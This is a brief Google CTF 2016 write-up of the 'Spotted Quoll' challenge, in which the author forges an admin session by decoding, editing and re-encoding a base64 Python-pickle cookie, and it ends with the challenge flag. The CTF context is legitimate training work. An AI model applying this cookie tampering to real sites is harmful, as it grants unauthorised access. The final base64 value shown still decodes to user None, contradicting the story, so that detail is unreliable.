First write-up from: Google CTF 2016
Competition link can be found here: https://spotted-quoll.ctfcompetition.com/
After turning on dev tools in Chrome I began to look around the simple site. The major thing which stuck out was that by clicking on the ‘Admin’ link I would land on the following page: https://spotted-quoll.ctfcompetition.com/#err=user_not_found
While being directed to that page you end up being issued a cookie called ‘ObsoletePickle.’ It appeared to be encoded some how, I tried to decode from base64 and received some useful information.
Encoded:
KGRwMQpTJ3B5dGhvbicKcDIKUydwaWNrbGVzJwpwMwpzUydzdWJ0bGUnCnA0ClMnaGludCcKcDUKc1MndXNlcicKcDYKTnMDecoded:
"(dp1\nS'python'\np2\nS'pickles'\np3\nsS'subtle'\np4\nS'hint'\np5\nsS'user'\np6\nNs."Going from the hint in this string I looked in to ‘python pickles’ and found out it was a form of data serialization commonly used for transmitting data over a network. After messing around with pickles in python a for awhile I was able to reverse what string was fed in to the python pickle-creating function and the input looked like this:
{'python': 'pickles', 'subtle': 'hint', 'user': None}Now that I was able to see it without all of the weird markup I understood that it was, essentially, 3 tuples and the second half of the last tuple was the Null datatype.
Returning to the ‘#err=user_not_found’ from earlier I had an idea of where to go with it. Since the link being clicked was to the ‘Admin’ page I replaced the ‘None’ datatype with the name ‘admin’ and then regenerated the pickle:
{'python': 'pickles', 'subtle': 'hint', 'user': 'admin'}Once I had the new string, I encoded it to base 64 and manually changed my cookie to that value.
KGRwMQpTJ3B5dGhvbicKcDIKUydwaWNrbGVzJwpwMwpzUydzdWJ0bGUnCnA0ClMnaGludCcKcDUKc1MndXNlcicKcDYKTnMuI was then able to go to the ‘admin’ page and the cookie was presented!
CTF{but_wait,theres_more.if_you_call}